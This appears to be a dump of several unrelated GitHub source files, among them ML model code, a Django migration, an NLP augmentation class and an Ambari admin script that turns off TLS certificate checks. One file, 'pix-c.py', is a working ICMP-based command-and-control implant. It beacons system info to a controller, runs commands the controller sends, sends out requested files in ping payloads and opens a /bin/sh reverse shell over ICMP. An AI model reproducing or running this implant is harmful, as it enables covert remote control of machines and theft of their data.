        freq_mask_max_bins=self.hps.freq_mask_max_bins,
        time_mask_count=self.hps.time_mask_count,
        time_mask_max_frames=self.hps.time_mask_max_frames,
        time_mask_max_ratio=self.hps.time_mask_max_ratio,
        time_masks_per_frame=self.hps.time_masks_per_frame,
        use_dynamic_time_mask_max_frames=self.hps
        .use_dynamic_time_mask_max_frames,
        use_specaug=self.hps.use_specaug,
        # A single residual_dropout_rate hparam feeds both dropout configs.
        attention_residual_dropout_rate=self.hps.residual_dropout_rate,
        feed_forward_residual_dropout_rate=self.hps.residual_dropout_rate,
        input_dropout_rate=self.hps.input_dropout_rate,
        enable_conformer_post_layer_norm=self.hps
        .enable_conformer_post_layer_norm,
        enable_decoder_pre_layer_norm=self.hps.enable_decoder_pre_layer_norm,
        use_lingvo_attention=self.hps.use_lingvo_attention)
    module = ConformerEncoderDecoder(config)
    return module

  def get_fake_inputs(self, hps):
    """Helper method solely for purpose of initalizing the model."""
    # One zero tensor per entry in hps.input_shape (inputs and paddings).
    dummy_inputs = [
        jnp.zeros((hps.batch_size, *x), dtype=hps.model_dtype)
        for x in hps.input_shape
    ]
    return dummy_inputs
| {
"content_hash": "3130d0577c92be8f18e6eebebb8b5e8c",
"timestamp": "",
"source": "github",
"line_count": 875,
"max_line_length": 127,
"avg_line_length": 34.753142857142855,
"alnum_prop": 0.6491499227202473,
"repo_name": "google/init2winit",
"id": "3898807fb153c3ca8e453793d19f42d6169a1297",
"size": "31012",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "init2winit/model_lib/conformer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1560124"
}
],
"symlink_target": ""
} |
from django.db import migrations
def drop_dynamic_theme_tag(apps, schema_editor):
    """Delete every Tag whose tag_text is 'dynamic theme' (historical model)."""
    tag_model = apps.get_model('tags', 'Tag')
    tag_model.objects.filter(tag_text='dynamic theme').delete()
class Migration(migrations.Migration):
    """Data migration: remove the obsolete 'dynamic theme' tag."""

    dependencies = [
        ('tags', '0002_auto_20210713_1131'),
    ]

    operations = [
        # Provide a no-op reverse so this migration can be unapplied;
        # RunPython without reverse_code makes the migration irreversible.
        migrations.RunPython(drop_dynamic_theme_tag,
                             migrations.RunPython.noop)
    ]
| {
"content_hash": "fcea428846fba9151a85e37a627f028c",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 57,
"avg_line_length": 22.058823529411764,
"alnum_prop": 0.656,
"repo_name": "wagnerand/addons-server",
"id": "9bf03ea2207f1a3281c3086baac39e36f3c2f5b1",
"size": "424",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/olympia/tags/migrations/0003_auto_20210721_1146.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "245987"
},
{
"name": "Dockerfile",
"bytes": "3900"
},
{
"name": "HTML",
"bytes": "290334"
},
{
"name": "JavaScript",
"bytes": "749163"
},
{
"name": "Less",
"bytes": "211386"
},
{
"name": "Makefile",
"bytes": "564"
},
{
"name": "Python",
"bytes": "6780019"
},
{
"name": "Shell",
"bytes": "8638"
},
{
"name": "Smarty",
"bytes": "1261"
}
],
"symlink_target": ""
} |
import fileinput
import sys
from datetime import date
import time
import signal
import subprocess as sub
from ConfigParser import SafeConfigParser
from optparse import OptionParser
import argparse
from scapy.all import *
import select
from impacket import ImpactDecoder
from impacket import ImpactPacket
def printLine(line,flag):
logfile = file('log/pingc.log', 'a')
if int(flag) == 2:
logfile.write(line + '\n')
print line
if int(flag) == 1:
logfile.write(line + '\n')
if not '[D]' in str(line):
print line
else:
logfile.write(line + '\n')
return
def pingshell(dst):
    """Serve an interactive reverse shell to *dst* over raw ICMP echo payloads.

    Commands arrive as ICMP data; each is piped into /bin/sh and the output is
    echoed back, chunked to fit in ICMP payloads. Returns when the peer sends
    'exit', the socket closes, or 9 consecutive 15s receive timeouts elapse.
    Requires raw-socket privileges. Reads the module-level `flag` for logging.
    """
    printLine( "[D] Dst: %s" % (dst),flag)
    s=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_ICMP)
    s.setblocking(0)
    # IP_HDRINCL: we build the full IP header ourselves via ImpactPacket.
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    printLine( "[*] Socket created",flag)
    ip = ImpactPacket.IP()
    ip.set_ip_dst(dst)
    # Create a new ICMP packet of type ECHO
    icmp = ImpactPacket.ICMP()
    icmp.set_icmp_type(icmp.ICMP_ECHO)
    # Initial '#' acts as the shell prompt sent to the controller.
    response = "#"
    printLine( "[D] Response: %s" % (response), flag)
    # Include the command as data inside the ICMP packet
    icmp.contains(ImpactPacket.Data(response))
    # Calculate its checksum
    icmp.set_icmp_cksum(0)
    icmp.auto_checksum = 1
    # Have the IP packet contain the ICMP packet (along with its payload)
    ip.contains(icmp)
    # Send it to the target host
    s.sendto(ip.get_packet(), (dst, 0))
    decoder = ImpactDecoder.IPDecoder()
    cmd = ''
    count = 0
    while 1:
        # Wait for incoming replies
        if s in select.select([ s ], [], [], 15)[0]:
            printLine("[*] Packet received from %s" % (dst),flag)
            buff = s.recv(4096)
            if 0 == len(buff):
                # Socket remotely closed
                s.close()
                return
            # Packet received; decode and display it
            ippacket = decoder.decode(buff)
            icmppacket = ippacket.child()
            # If the packet matches, report it to the user
            # Get identifier and sequence number
            data = icmppacket.get_data_as_string()
            if len(data) > 0:
                if data != '\n':
                    printLine("[D] Data: %s" % (str(data)),flag)
                    if data.split('\n')[0] == 'exit':
                        s.close()
                        return
                    # Parse command from standard input
                    try:
                        shell_proc=sub.Popen(["/bin/sh", "-i"],shell=True,stdin=sub.PIPE,stdout=sub.PIPE,stderr=sub.PIPE)
                    except Exception, e:
                        printLine("[X] ERROR: %s" % (str(e)),flag)
                    try:
                        # Feed the received command to the shell's stdin.
                        response = shell_proc.communicate(data)[0]
                        printLine("[D] Response: %s" % (response),flag)
                    except Exception,e:
                        printLine( "[X] Error reading response",flag)
                        response = 'error\n'
                    # Append the prompt so the controller knows output ended.
                    response = response + '#'
                    printLine("[D] Response: %s" % (response),flag)
                else:
                    # Bare newline: just re-send the prompt.
                    response = '#'
                # 1432 keeps each payload under a typical 1500-byte MTU.
                if len(response) > 1432:
                    chunks, chunk_size = len(response), len(response)/1432
                    printLine( "[D] Chunks: %s, chunk_size: %s" % (chunks, chunk_size),flag)
                    for i in range(0, chunks, chunk_size):
                        printLine( "[D] Response[%s]: %s" % (i,str(response[i:i+chunk_size])),flag)
                        # Include the command as data inside the ICMP packet
                        icmp.contains(ImpactPacket.Data(str(response[i:i+chunk_size])))
                        # Calculate its checksum
                        icmp.set_icmp_cksum(0)
                        icmp.auto_checksum = 1
                        # Have the IP packet contain the ICMP packet (along with its payload)
                        ip.contains(icmp)
                        # Send it to the target host
                        s.sendto(ip.get_packet(), (dst, 0))
                        printLine( "[D] Packet sent: %s" % (response),flag)
                else:
                    # Include the command as data inside the ICMP packet
                    icmp.contains(ImpactPacket.Data(response))
                    # Calculate its checksum
                    icmp.set_icmp_cksum(0)
                    icmp.auto_checksum = 1
                    # Have the IP packet contain the ICMP packet (along with its payload)
                    ip.contains(icmp)
                    # Send it to the target host
                    s.sendto(ip.get_packet(), (dst, 0))
                    printLine( "[D] Packet sent: %s" % (response),flag)
        else:
            # select() timed out: keep the session alive by re-sending a prompt,
            # give up after 9 consecutive timeouts.
            printLine( "[*] Select timeout hit, resending empty prompt",flag)
            count = count + 1
            if count == 9:
                printLine("[X] Session lost, disconnecting",flag)
                return
            ip = ImpactPacket.IP()
            ip.set_ip_dst(dst)
            # Create a new ICMP packet of type ECHO
            icmp = ImpactPacket.ICMP()
            icmp.set_icmp_type(icmp.ICMP_ECHO)
            prompt = '#'
            # Include the command as data inside the ICMP packet
            icmp.contains(ImpactPacket.Data(prompt))
            # Calculate its checksum
            icmp.set_icmp_cksum(0)
            icmp.auto_checksum = 1
            # Have the IP packet contain the ICMP packet (along with its payload)
            ip.contains(icmp)
            # Send it to the target host
            s.sendto(ip.get_packet(), (dst, 0))
    # NOTE(review): unreachable -- the 'while 1' loop only exits via return.
    printLine( "[*] Socket closed and returning",flag)
def getSleep():
    """Read the 'sleep' interval (seconds) from conf/pingc.conf and sleep for it."""
    conf_file = 'conf/pingc.conf'
    cp = SafeConfigParser()
    cp.optionxform = str # Preserves case sensitivity
    # 'with' closes the handle; the original readfp(open(...)) leaked it.
    with open(conf_file, 'r') as fh:
        cp.readfp(fh)
    section = 'Main'
    sleep = cp.get(section,'sleep')
    printLine( "[*] Sleeping for %s seconds" % (sleep),flag)
    time.sleep(int(sleep))
    return
def setSleep(sleep):
    """Persist the beacon interval *sleep* (seconds) into conf/pingc.conf."""
    conf_file = 'conf/pingc.conf'
    cp = SafeConfigParser()
    cp.optionxform = str # Preserves case sensitivity
    # 'with' closes both handles; the original open() calls leaked them.
    with open(conf_file, 'r') as fh:
        cp.readfp(fh)
    section = 'Main'
    options = {'sleep': sleep}
    for option, value in options.items():
        cp.set(section, option, value)
    with open(conf_file, 'w') as fh:
        cp.write(fh)
def getId():
    """Return the bot's assigned id from conf/pingc.conf (section Main, key id)."""
    conf_file = 'conf/pingc.conf'
    printLine( "[D] Getting bot Id",flag)
    cp = SafeConfigParser()
    cp.optionxform = str # Preserves case sensitivity
    # 'with' closes the handle; the original readfp(open(...)) leaked it.
    with open(conf_file, 'r') as fh:
        cp.readfp(fh)
    section = 'Main'
    # Renamed from 'id' to avoid shadowing the builtin.
    bot_id = cp.get(section,'id')
    printLine( "[D] ID found: %s" % (bot_id),flag)
    return bot_id
def setId(botId):
conf_file = 'conf/pingc.conf'
print "[D] Writing bot Id: ",botId
cp = SafeConfigParser()
cp.optionxform = str # Preserves case sensitivity
cp.readfp(open(conf_file, 'r'))
section = 'Main'
options = {'checkedin': '1',
'id': botId}
for option, value in options.items():
cp.set(section, option, value)
cp.write(open(conf_file, 'w'))
def active():
    """Return the 'checkedin' value from conf/pingc.conf ('1' once registered)."""
    conf_file = 'conf/pingc.conf'
    cp = SafeConfigParser()
    cp.optionxform = str # Preserves case sensitivity
    # 'with' closes the handle; the original readfp(open(...)) leaked it.
    with open(conf_file, 'r') as fh:
        cp.readfp(fh)
    section = 'Main'
    printLine("[D] checking pingc.conf for checkedin",flag)
    return cp.get(section,'checkedin')
def handler(signum, frame):
    """SIGINT handler: exit the client cleanly on Ctrl-C."""
    print 'Bye!'
    sys.exit()
def sendFile(dest,filename,botId):
    """Exfiltrate *filename* to *dest* line by line inside ICMP echo payloads.

    The transfer is framed with '(FILE_START)', per-line '(FILE)', and
    '(FILE_END)' markers, each tagged with *botId*. Reads module-level `flag`.
    """
    printLine( "[*] Sending file: %s" % (filename),flag)
    try:
        file = open(filename, 'r')
    except Exception, e:
        printLine( "[X] File error: %s" % (str(e)),flag)
        return
    startLine = '(FILE_START) ' + botId + ' ' + str(filename)
    printLine("[D] Startline: %s" % (startLine),flag)
    packet=IP(dst=dest)/ICMP()/startLine
    p=sr1(packet,timeout=1)
    for line in file:
        printLine( "[D] Sending line: %s" % (line),flag)
        sendLine = '(FILE) ' + botId + ' ' + filename + ' ' + line
        packet=IP(dst=dest)/ICMP()/sendLine
        #send(packet)
        #time.sleep(1)
        # sr1 waits for the echo reply so lines arrive in order.
        p=sr1(packet,timeout=1)
    printLine( "[D] End of file",flag)
    finishLine = '(FILE_END) ' + botId + ' ' + str(filename)
    packet=IP(dst=dest)/ICMP()/finishLine
    # Fire-and-forget for the final marker; no reply needed.
    send(packet)
def sendPingRequest(dest, request, botId):
    """Send *request* to the C2 server inside an ICMP echo and wait for a reply.

    The bot id is appended to the request except for the initial checkin
    (sentinel id '123456789'), which is sent bare. Returns the scapy reply
    packet, or None on timeout/error. Reads the module-level `flag`.
    """
    full_request = request + ' ' + str(botId)
    if botId == '123456789':
        # Initial Checkin request
        packet = IP(dst=dest)/ICMP()/str(request)
    else:
        packet = IP(dst=dest)/ICMP()/str(full_request)
    try:
        p = sr1(packet, timeout=10)
        if p:
            return p
        else:
            return None
    except Exception:
        # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
        # still propagate (the SIGINT handler relies on that).
        printLine( "[X] Error receiving packet",flag)
        return None
def processReply(dest,p):
    """Dispatch on the C2 reply payload in *p* and execute the matching action.

    Supported commands (matched by substring, first hit wins): 'run' (execute
    shell command), 'sysinfo' (report uname -a), 'Thanks' (ack + sleep),
    'get' (exfiltrate a file), 'sleep' (update beacon interval), 'id='
    (store assigned id), 'shell' (open ICMP reverse shell). Reads module-level
    `flag` and `filesSent`.
    """
    try:
        response=p['Raw'].load
        printLine("[D] Response: %s" % response, flag)
    except:
        # Reply had no Raw payload (or p is None): nothing to do.
        print "[X] Error: ", sys.exc_info()[0]
        return
    # Check ICMP data for 'run' command
    printLine( "[*] String received from C2 server: " + p['Raw'].load,flag)
    if 'run' in response:
        # Everything after 'run ' is the shell command to execute.
        printLine( "[*] Master says run command: " + response[4:],flag)
        command = response[4:]
        command.split()
        proc = sub.Popen(command,stdout=sub.PIPE,stderr=sub.PIPE,shell=True)
        output, errors = proc.communicate()
        printLine( output,flag)
        printLine( errors,flag)
    elif 'sysinfo' in response:
        printLine( "[*] Master requesting sysinfo",flag)
        proc = sub.Popen(['uname -a'],stdout=sub.PIPE,stderr=sub.PIPE,shell=True)
        output, errors = proc.communicate()
        botId=getId()
        sendRequest = 'sysinfo %s %s' % (botId,output)
        # Recurse to handle whatever the server sends back.
        p=sendPingRequest(dest,sendRequest, botId)
        if p:
            processReply(dest,p)
        else:
            printLine("[D] No Reply found",flag)
        printLine(output,flag)
        printLine( errors,flag)
    elif 'Thanks' in response:
        printLine( "[*] Thanks received",flag)
        printLine( "[*] Sleeping for 10",flag)
        time.sleep(10)
    elif 'get' in response:
        # Everything after 'get ' is the file path to exfiltrate.
        printLine( "[*] Master says give him %s" % (response[4:]),flag)
        botId=getId()
        printLine( "[D] filesSent: %s" % (str(filesSent)),flag)
        # filesSent de-duplicates transfers within this process lifetime.
        if response[4:] not in filesSent:
            sendFile(dest,response[4:], botId)
            filesSent.append(response[4:])
        else:
            printLine( "[*] File already sent...skipping",flag)
    elif 'sleep' in response:
        seconds = response[6:]
        printLine("[*] Master says sleep for %s seconds" % (seconds),flag)
        printLine ("[*] Sleeping...",flag)
        setSleep(seconds)
    elif 'id=' in response:
        printLine("[*] Checked in...placing id in conf file",flag)
        setId(response[3:])
    elif 'shell' in response:
        printLine( "[*] Master wants shell, master gets shell",flag)
        time.sleep(10)
        pingshell(dest)
def main(dest,flag):
    """Main beacon loop: check in with the C2 at *dest*, then poll for tasking.

    Each iteration asks the server for work, dispatches the reply via
    processReply(), and sleeps for the configured interval. Never returns
    except via the SIGINT handler.
    """
    # Tracks files already exfiltrated; shared with processReply().
    global filesSent
    filesSent = []
    # check for log directory; create if it doesn't exist
    if not os.path.exists('log'):
        os.makedirs('log')
    printLine("--------------------------------------------",flag)
    printLine("PingC.py started on %s" % (date.today()),flag)
    printLine("--------------------------------------------",flag)
    printLine("[D] flag=%s" % (flag),flag)
    while True:
        signal.signal(signal.SIGINT, handler)
        # Not yet registered: send the initial checkin with system info.
        if int(active()) != 1:
            printLine("[*] Not checked in...checking in now",flag)
            proc = sub.Popen(['uname -a'],stdout=sub.PIPE,stderr=sub.PIPE,shell=True)
            output, errors = proc.communicate()
            # '123456789' is the sentinel id used before the server assigns one.
            p=sendPingRequest(dest,'Checkin %s' % output,'123456789')
            if p:
                processReply(dest,p)
            printLine(output,flag)
            printLine(errors,flag)
            printLine("[D] id==null",flag)
            pass
        # Regular tasking poll with the stored bot id.
        id = getId()
        sendStr="What shall I do master?"
        p=sendPingRequest(dest,sendStr, id)
        if p:
            processReply(dest,p)
        getSleep()
if __name__ == "__main__":
    # NOTE(review): ArgumentParser(version=...) relies on the 2.x-era argparse
    # that still accepted the deprecated 'version' keyword -- confirm against
    # the interpreter this script targets.
    parser = argparse.ArgumentParser(version="%prog 1.0",description="PiX-C2 client for icmp based C2")
    parser.add_argument('dest', help='Destination IP or hostname for C2', metavar='DEST')
    parser.add_argument("-d", "--debug", dest='debug', help="debug level 1-2", metavar="DEBUG", default=0)
    args = parser.parse_args()
    # BUG FIX: 'flag' was only assigned when --debug was passed; without it
    # main() raised NameError. Always assign, keeping the 0 default.
    flag = args.debug
    main(args.dest,flag)
| {
"content_hash": "7c5537f4f2f1ae06a11f8d56cff440f6",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 117,
"avg_line_length": 32.66120218579235,
"alnum_prop": 0.583068428977748,
"repo_name": "nocow4bob/PiX-C2",
"id": "9dbd95091fef3f8613888ec43ee1fe6984dabafe",
"size": "12287",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pix-c.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "10398"
},
{
"name": "Python",
"bytes": "33636"
},
{
"name": "Shell",
"bytes": "529"
}
],
"symlink_target": ""
} |
import json
import os
import spacy
from nlaugmenter.interfaces.SentenceOperation import SentenceOperation
from nlaugmenter.tasks.TaskTypes import TaskType
from nlaugmenter.utils.initialize import spacy_nlp
class DyslexiaWordsSwap(SentenceOperation):
    """Altering some words with mistakes that are likely to happen in the context of dyslexia.

    Args:
        seed: initial seed. Defaults: 0.
        max_outputs: maximum number of generated outputs. Defaults: 1.
    """

    tasks = [TaskType.TEXT_CLASSIFICATION, TaskType.TEXT_TO_TEXT_GENERATION]
    languages = ["en"]
    keywords = [
        "lexical",
        "rule-based",
        "external-knowledge-based",
        "aural",
        "possible-meaning-alteration",
        "low-precision",
        "low-coverage",
        "low-generations",
    ]

    def __init__(self, seed=0, max_outputs=1):
        super().__init__(seed=seed, max_outputs=max_outputs)
        self.nlp = spacy_nlp if spacy_nlp else spacy.load("en_core_web_sm")
        data_path = os.path.join(os.path.dirname(__file__), "data.json")
        with open(data_path, "r") as infile:
            data = json.load(infile)
        # Flatten the per-category confusion mappings into one lookup table...
        self.swap_words = {
            word: confusable
            for category in data.values()
            for word, confusable in category.items()
        }
        # ...plus the reverse direction so the swap works both ways.
        self.swap_words_2 = {
            confusable: word for word, confusable in self.swap_words.items()
        }

    def generate(self, sentence: str):
        """Return [sentence] with known confusable words swapped, spacing preserved."""
        pieces = []
        cursor = 0
        for token in self.nlp(sentence):
            # Copy whatever lies between the previous token and this one.
            pieces.append(sentence[cursor:token.idx])
            lowered = token.text.lower()
            # The reverse map wins when a word appears in both directions,
            # mirroring the original lookup order.
            if lowered in self.swap_words_2:
                pieces.append(self.swap_words_2[lowered])
            elif lowered in self.swap_words:
                pieces.append(self.swap_words[lowered])
            else:
                pieces.append(token.text)
            cursor = token.idx + len(token.text)
        pieces.append(sentence[cursor:])
        return ["".join(pieces)]
| {
"content_hash": "3266de5f4d6b91d8de1577ded98f3bd1",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 94,
"avg_line_length": 31.6984126984127,
"alnum_prop": 0.586379569354031,
"repo_name": "GEM-benchmark/NL-Augmenter",
"id": "28158fb788c07d1d1209b520e60441dfa13503e4",
"size": "1997",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "nlaugmenter/transformations/dyslexia_words_swap/transformation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "151288"
},
{
"name": "Makefile",
"bytes": "343"
},
{
"name": "Python",
"bytes": "1003016"
}
],
"symlink_target": ""
} |
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import urllib2, ssl
import json
import base64
import optparse
import ConfigParser
# Protocol schemes accepted by the --protocol option.
HTTP_PROTOCOL = 'http'
HTTPS_PROTOCOL = 'https'
# Ambari REST endpoint templates; {n} placeholders are filled with str.format.
CLUSTERS_URL = '/api/v1/clusters/{0}'
SERVICE_URL = '/services/{0}'
COMPONENT_URL = '/services/{0}/components/{1}'
HOST_COMPONENT_URL = '/hosts/{0}/host_components/{1}'
GET_HOST_COMPONENTS_URL = '/services/{0}/components/{1}?fields=host_components'
STACK_CONFIG_DEFAULTS_URL = '/api/v1/stacks/{0}/versions/{1}/services/{2}/configurations?fields=StackConfigurations/type,StackConfigurations/property_value'
CREATE_CONFIGURATIONS_URL = '/configurations'
GET_ALL_HOST_COMPONENTS_URL = '/host_components'
def api_accessor(host, username, password, protocol, port):
  """Return a closure that issues authenticated requests against the Ambari API.

  The returned callable has signature (api_url, request_type, request_body='')
  and returns the raw response body as a string; failures are re-raised as a
  generic Exception with the cause embedded in the message.
  """
  def do_request(api_url, request_type, request_body=''):
    try:
      url = '{0}://{1}:{2}{3}'.format(protocol, host, port, api_url)
      print 'Execute {0} {1}'.format(request_type, url)
      if request_body:
        print 'Request body: {0}'.format(request_body)
      # HTTP basic auth header built by hand (urllib2 has no session support).
      admin_auth = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')
      request = urllib2.Request(url)
      request.add_header('Authorization', 'Basic %s' % admin_auth)
      # Ambari rejects mutating requests without this header.
      request.add_header('X-Requested-By', 'ambari')
      request.add_data(request_body)
      # urllib2 infers GET/POST from the data; override to force PUT/DELETE.
      request.get_method = lambda: request_type
      response = None
      if protocol == 'https':
        # NOTE(review): certificate verification is disabled, presumably for
        # self-signed Ambari setups -- this is insecure against MITM.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        response = urllib2.urlopen(request, context=ctx)
      else:
        response = urllib2.urlopen(request)
      response_body = response.read()
    except Exception as exc:
      raise Exception('Problem with accessing api. Reason: {0}'.format(exc))
    return response_body
  return do_request
def get_json(accessor, url):
  """GET *url* through *accessor* and decode the JSON response body."""
  raw_body = accessor(url, 'GET')
  return json.loads(raw_body)
def apply_configs(options, accessor, configs):
  """Mark each config in *configs* as a desired config on the cluster.

  Strips the (already-posted) 'properties' payload from every entry and
  issues one PUT per config type.
  """
  for config_name, config_value in configs.items():
    # desired_configs only needs type/tag; properties were created separately.
    config_value.pop("properties", None)
    request_body = {
        "Clusters": {
            "desired_configs": {config_name: config_value}
        }
    }
    accessor(CLUSTERS_URL.format(options.cluster), 'PUT', json.dumps(request_body))
def create_configs(options, accessor, merged_properties, tag):
  """POST one configuration resource per config type; return them keyed by type.

  Every config gets the same *tag*; the returned dict still contains the
  'properties' payload (apply_configs strips it later).
  """
  configs_for_posts = {}
  for config_type in merged_properties:
    config = {}
    config['type'] = config_type
    config['tag'] = tag
    config['properties'] = merged_properties[config_type]
    configs_for_posts[config_type] = config
    # Each config type is created individually against /configurations.
    accessor(CLUSTERS_URL.format(options.cluster) + CREATE_CONFIGURATIONS_URL, 'POST', json.dumps(config))
  return configs_for_posts
def generate_component_hosts_ini(options, accessor):
  """Write an ini file mapping each supported component to its host list.

  Queries all host_components of the cluster, keeps only the components named
  in options.component_list, and writes one section per component with a
  comma-separated 'hosts' key to options.ini_file.
  """
  component_hosts_result={}
  supported_components = options.component_list.split(',')
  hosts_components_response = get_json(accessor, CLUSTERS_URL.format(options.cluster) + GET_ALL_HOST_COMPONENTS_URL)
  if 'items' in hosts_components_response and len(hosts_components_response['items']) > 0:
    for host_role_data in hosts_components_response['items']:
      host_roles = host_role_data['HostRoles']
      component_name = host_roles['component_name']
      if component_name in supported_components:
        host_name = host_roles['host_name']
        if component_name not in component_hosts_result:
          component_hosts_result[component_name]=[]
        # De-duplicate hosts per component.
        if host_name not in component_hosts_result[component_name]:
          component_hosts_result[component_name].append(host_name)
  config = ConfigParser.RawConfigParser()
  for component in component_hosts_result:
    config.add_section(component)
    config.set(component, 'hosts', ",".join(component_hosts_result[component]))
  with open(options.ini_file, 'w') as f:
    config.write(f)
def get_stack_default_properties(stack_default_properties_json):
  """Convert a stack-configurations API response into {config_type: {name: value}}.

  The '.xml' suffix is stripped from each config type; entries without a
  'StackConfigurations' key are ignored.
  """
  defaults = {}
  for item in stack_default_properties_json.get('items', []):
    if 'StackConfigurations' not in item:
      continue
    stack_config = item['StackConfigurations']
    config_type = stack_config['type'].replace('.xml', '')
    defaults.setdefault(config_type, {})[
        stack_config['property_name']] = stack_config['property_value']
  return defaults
def create_host_components(options, accessor, components_hosts, component_name):
  """POST a host_component for *component_name* onto every host in *components_hosts*."""
  cluster_url = CLUSTERS_URL.format(options.cluster)
  for host in components_hosts:
    accessor(cluster_url + HOST_COMPONENT_URL.format(host, component_name), 'POST')
def get_component_hosts(component_host_object_list):
  """Extract host names from a component's host_components listing.

  Entries lacking a 'HostRoles' key are skipped; order is preserved.
  """
  return [
      host_component['HostRoles']['host_name']
      for host_component in component_host_object_list.get('host_components', [])
      if 'HostRoles' in host_component
  ]
def merge_properties(properties, stack_default_properties):
  """Overlay backed-up *properties* onto *stack_default_properties*.

  Only config types present in the stack defaults are returned; for keys the
  stack knows about, differing backup values win over the defaults.
  NOTE: mutates *stack_default_properties* in place.
  """
  new_properties = {}
  print 'Processing new properties...'
  for new_properties_config_type in stack_default_properties:
    if new_properties_config_type in properties:
      for old_config in properties[new_properties_config_type]:
        # Only override keys the stack defines and whose values differ.
        if old_config in stack_default_properties[new_properties_config_type] \
          and stack_default_properties[new_properties_config_type][old_config] != \
            properties[new_properties_config_type][old_config]:
          print 'Override {0}/{1} property from the backup.'.format(new_properties_config_type, old_config)
          stack_default_properties[new_properties_config_type][old_config] = properties[new_properties_config_type][old_config]
    # Every stack config type is returned, merged or not.
    new_properties[new_properties_config_type] = stack_default_properties[new_properties_config_type]
  return new_properties
def start_service(options, accessor, parser):
  '''
  Start service
  '''
  # Transition the service to STARTED via the Ambari service endpoint.
  start_body = ('{"RequestInfo": {"context" :"Start %s"}, '
                '"Body": {"ServiceInfo": {"state": "STARTED"}}}' % options.service)
  service_url = CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service)
  accessor(service_url, 'PUT', start_body)
def stop_service(options, accessor, parser):
  '''
  Stop service
  '''
  # In Ambari, "INSTALLED" is the stopped state for a deployed service.
  stop_body = ('{"RequestInfo": {"context" :"Stop %s"}, '
               '"Body": {"ServiceInfo": {"state": "INSTALLED"}}}' % options.service)
  service_url = CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service)
  accessor(service_url, 'PUT', stop_body)
def install_service(options, accessor, parser):
  '''
  Install service
  '''
  # Request the INSTALLED state, which triggers installation if needed.
  install_body = ('{"RequestInfo": {"context" :"Install %s"}, '
                  '"Body": {"ServiceInfo": {"state": "INSTALLED"}}}' % options.service)
  service_url = CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service)
  accessor(service_url, 'PUT', install_body)
def remove_service(options, accessor, parser):
  '''
  Remove Solr service
  '''
  service_url = CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service)
  accessor(service_url, 'DELETE')
def configure(options, accessor, parser):
  '''
  Configure service - put next to another components or provide the host list
  '''
  # Create the service and component resources first.
  accessor(CLUSTERS_URL.format(options.cluster) + SERVICE_URL.format(options.service), 'POST')
  accessor(CLUSTERS_URL.format(options.cluster) + COMPONENT_URL.format(options.service, options.component), 'POST')
  stack_default_properties = get_stack_default_properties(get_json(accessor, STACK_CONFIG_DEFAULTS_URL.format(options.stack_name, options.stack_version, options.service)))
  # Target hosts: an explicit --hosts-list wins; otherwise co-locate with the
  # hosts already running --next-to-service/--next-to-component.
  hosts = None
  if options.hosts_list:
    hosts = options.hosts_list.split(",")
  else:
    hosts = get_component_hosts(get_json(accessor, CLUSTERS_URL.format(options.cluster) + GET_HOST_COMPONENTS_URL.format(options.next_to_service, options.next_to_component)))
  # NOTE(review): the config tag is hard-coded; re-running configure may
  # conflict with an existing configuration version using the same tag.
  configs = create_configs(options, accessor, stack_default_properties, "tag123456")
  apply_configs(options, accessor, configs)
  create_host_components(options, accessor, hosts, options.component)
if __name__=="__main__":
  # CLI entry point: parse options, build the API accessor, dispatch on --action.
  parser = optparse.OptionParser("usage: %prog [options]")
  parser.add_option("--action", dest="action", type="string", help="configure | install | start | stop | remove")
  parser.add_option("--component", dest="component", type="string", help="component name")
  parser.add_option("--service", dest="service", type="string", help="service name")
  parser.add_option("--next-to-component", dest="next_to_component", type="string", help="install component where this component installed")
  parser.add_option("--next-to-service", dest="next_to_service", type="string", help="install component where this service installed")
  parser.add_option("--host", dest="host", default="localhost", type="string", help="hostname for ambari server")
  parser.add_option("--hosts-list", dest="hosts_list", type="string", help="comma separated hosts (to install components)")
  parser.add_option("--port", dest="port", default=8080, type="int", help="port number for ambari server")
  parser.add_option("--cluster", dest="cluster", type="string", help="cluster name")
  parser.add_option("--protocol", dest="protocol", default=HTTP_PROTOCOL, help="ambari protocol (http | https)")
  parser.add_option("--username", dest="username", default="admin", type="string", help="username for accessing ambari server")
  parser.add_option("--password", dest="password", default="admin", type="string", help="password for accessing ambari server")
  parser.add_option("--extra-configs", dest="extra_config", type="string", help="configurations to apply with stack defaults")
  parser.add_option("--stack-name", dest="stack_name", default="HDP", type="string", help="name of the stack")
  parser.add_option("--stack-version", dest="stack_version", default="2.6", type="string", help="version of the stack")
  parser.add_option("--ini-file", dest="ini_file", default="ambari_components.ini", type="string", help="Filename of the generated ini file for host components (default: ambari_components.ini)")
